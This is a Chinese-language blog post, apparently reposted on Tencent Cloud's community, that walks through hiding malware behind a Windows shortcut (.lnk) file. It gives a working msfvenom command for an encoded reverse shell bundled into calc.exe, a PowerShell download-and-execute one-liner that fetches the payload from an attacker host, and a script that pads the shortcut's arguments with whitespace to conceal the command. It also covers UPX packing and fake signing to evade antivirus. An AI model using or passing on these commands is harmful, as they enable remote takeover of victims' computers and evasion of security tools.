专栏首页洛米唯熊利用快捷方式隐藏并执行shellcode

利用快捷方式隐藏并执行shellcode

0x00:简介

快捷方式是win系统下为各种程序、文件、文件夹提供的一种快速启动程序。

后缀名大多为(.lnk),少见的后缀名有(.pif)、(.url)。

早期的“桌面图标lnk木马”也是危害一时。“恶意程序”通过伪造成正常应用来混淆视听,造成恶意破坏等操作。

0x01:环境准备

1、MSF

2、UPX(pip install upx)

3、数字签名添加器(https://www.ttrar.com/html/7418.html)

4、Phpstudy

5、攻击机器Win7-64位(172.20.10.2)

6、受害者机器Win7-32位(172.20.10.3)

7、攻击机器Kali(172.20.10.14)

0x02:过程

一、MSF生成payload并进行简单的免杀处理

1、编码、捆绑(正常的32位calc.exe)

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=172.20.10.14 LPORT=6667 -x calc.exe -f exe -o jaky.exe

2、加壳、签名

利用upx加壳并生成“jaky666.exe”

添加数字签名

二、Win7-64位 搭建web服务(phpstudy)

启动一个web服务,并把”jaky666.exe”放在目录下。等待被远程下载。

三、恶意Ink部署

1、新建立一个text.txt并填写如下代码

cmd /c (echo powershell "($client = new-object System.Net.WebClient) -and ($client.DownloadFile('http://172.20.10.2/jaky666.exe', ‘jaky666.exe’)) -and (exit)") | cmd && start jaky666.exe

2、新建立一个1.ps1并填写如下代码

$file = Get-Content "D:\1\kkkkk\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("D:\1\kkkkk\jaky.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '                                                                                                                                                                                                                                      '+ $file
$Shortcut.Save()

3、powershell执行1.ps1在当前目录生成“jaky.lnk”

部署完成

接下来

把“jaky.Ink”文件扔给受害者服务器

四、MSF开启监听

五、受害者服务器执行”Ink”

获取到shell

六、查看Ink

0x03:查杀测试

一、本地查杀

二、在线查杀

1、Ink查杀http://r.virscan.org/language/zh-cn/report/e2f14da45f32b03430bd7feb7c384189

(因为快捷方式引用的是cmd.exe,所以上传的程序就是cmd.exe)

2、jaky666.exe查杀

http://r.virscan.org/language/zh-cn/report/8773a7a9dfd1a48becd614e70bc689d3

居然被查杀了

一首(凉凉)送给自己

0x04:闲言碎语

1、图标可以换成正常的应用程序的,方便隐藏

2、Ink快捷方式运行后,会在当前目录下存在“恶意程序”。存放目录还需要改进。或者更加高明的隐藏

3、该“恶意程序”只是做了简单的免杀,甚至并不免杀。这里期待免杀大佬改进

4、好好学习、天天向上

5、技术本无罪,恶意利用技术的人才是魔鬼

6、本文只做技术分享,利用该技术恶意破坏的人,后果自负。

本文分享自微信公众号 - 洛米唯熊(luomiweixiong),作者:Jaky

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-09-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 利用WinRM实现内网无文件攻击反弹shell

    WinRM是WindowsRemoteManagementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者44...

    洛米唯熊
  • 基于白名单 Regasm.exe 执行 Payload 第三季

    Regasm为程序集注册工具,读取程序集中的元数据,并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进...

    洛米唯熊
  • 基于白名单 Installutil.exe 执行 Payload 第二季

    Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.I...

    洛米唯熊
  • blupf90 如何在windows下安装使用

    假定我的exe文件, 在D:\blup90_win\2019中. 命令: 进入D盘

    邓飞
  • Windows终端好难用? 试试git bash吧!

    zhaoolee
  • Medusalocker勒索病毒,小心勒索加密无得解

    近日,深信服安全团队接到用户的勒索求助,排查发现是一款名为MedusaLocker的勒索软件家族。该勒索病毒家族具有一些独特的功能,它不仅会感染本地计算机,而且...

    FB客服
  • 手工 - 内网信息收集

    我们通过收集本机信息可以进一步了解到整个域的操作系统,软件,补丁安装,用户命名规范等等,方便进一步渗透测试。

    黑白天安全
  • win2003服务器安全设置教程

    用户1127987
  • 常见反病毒进程/服务/识别总结

    服务名:GDScan(G Data扫描器)、AVKWCtl(G Data文件系统实时监控)、AntiVirusKit Client(G Data安全软件客户端)...

    贝塔安全实验室
  • windows XP cmd命令大全 (1)

    accwiz.exe -> 辅助工具向导 acsetups.exe -> acs setup dcom server executable actmovie...

    赵腰静

扫码关注云+社区

领取腾讯云代金券